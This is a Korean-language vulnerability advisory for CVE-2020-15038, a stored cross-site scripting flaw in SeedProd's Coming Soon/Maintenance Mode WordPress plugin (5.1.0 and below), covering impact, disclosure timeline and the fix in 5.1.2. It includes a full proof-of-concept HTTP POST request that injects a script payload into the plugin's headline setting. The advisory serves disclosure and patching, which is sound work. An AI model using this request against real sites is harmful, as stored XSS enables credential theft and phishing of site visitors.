출시 예정 페이지, WordPress 버전 5.1.0 이하용 SeedProd 플러그인의 건설 및 유지 관리 모드에서 플러그인을 감사하는 동안 저장된 XSS에 취약한 것으로 나타났습니다. 데이터 삭제가 개선된 플러그인 버전 5.1.2가 2020년 6월 24일에 출시되었습니다.
CVE ID: CVE-2020-15038
요약
SeedProd의 출시 예정 페이지, 공사 및 유지 관리 모드는 1백만 개 이상의 활성 설치가 있는 인기 있는 WordPress 플러그인입니다. 저장된 XSS(Cross-Site Scripting) 취약점에 취약한 것으로 확인되었습니다. XSS는 공격자가 피해자의 세션 쿠키 또는 로그인 자격 증명을 훔치고, 피해자를 대신하여 임의의 작업을 수행하고, 키 입력을 기록하는 등 다양한 악의적인 작업을 수행하기 위해 악용될 수 있는 일종의 취약점입니다.
영향
공격자가 이 취약점을 악용하는 악의적인 작업을 수행할 수 있는 방법은 여러 가지가 있지만 두 가지를 살펴보겠습니다.
- 리디렉션 :
공격자가 취약점을 악용하는 경우 XSS 페이로드를 사용하여 개발자가 유지 관리 모드를 활성화할 때마다 사이트를 방문하는 사용자가 공격자의 제어 하에 있는 도메인으로 리디렉션되도록 리디렉션할 수 있습니다. 사용자가 자격 증명을 제출할 수 있는 로그인 양식을 사용하여 원래 웹 사이트와 똑같이 보이도록 만들었습니다. 사용자가 변경된 도메인을 인지하지 않고 자격 증명을 제출하면 계정이 손상됩니다.
- 피싱 :
마찬가지로 공격자는 페이로드를 사용하여 출시 예정/유지 관리 모드 페이지 자체에 로그인 양식을 생성하여 순진한 사용자가 자격 증명을 입력하도록 유도할 수 있습니다.
취약점
플러그인 설정의 다른 필드와 함께 페이지 설정 섹션 아래의 헤드라인 필드는 곧 출시 페이지가 표시될 때 트리거되는 저장된 XSS에 취약한 것으로 밝혀졌습니다(미리보기 모드와 라이브 모두).
POST /wp-admin/options.php HTTP/1.1
Host: localhost:10004
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://localhost:10004/wp-admin/admin.php?page=seed_csp4
Content-Type: application/x-www-form-urlencoded
Content-Length: 636
Origin: https://localhost:10004
Connection: close
Cookie: ...
option_page=seed_csp4_settings_content&action=update&_wpnonce=faced0b8ff&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dseed_csp4&seed_csp4_settings_content%5Bstatus%5D=1&seed_csp4_settings_content%5Blogo%5D=&seed_csp4_settings_content%5Bheadline%5D=%3Cscript%3Ealert%28%22Stored+XSS+in+Page+Headline%22%29%3C%2Fscript%3E&seed_csp4_settings_content%5Bdescription%5D=Proof+of+Concept&seed_csp4_settings_content%5Bfooter_credit%5D=0&submit=Save+All+Changes&seed_csp4_settings_content%5Bfavicon%5D=&seed_csp4_settings_content%5Bseo_title%5D=&seed_csp4_settings_content%5Bseo_description%5D=&seed_csp4_settings_content%5Bga_analytics%5D=
타임라인
취약점은 2020년 6월 22일 SeedProd 팀에 보고되었습니다.
취약점 수정이 포함된 버전 5.1.2가 2020년 6월 24일에 릴리스되었습니다.
권장사항
플러그인을 최신 버전으로 업데이트하는 것이 좋습니다.
참조
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15038
- https://nvd.nist.gov/vuln/detail/CVE-2020-15038
- https://wordpress.org/plugins/coming-soon/#developers
- https://wpvulndb.com/vulnerabilities/10283
최상의 보안 방법을 위해 아래 가이드를 따르세요.
- WordPress 보안 가이드
- WordPress 해킹 및 맬웨어 제거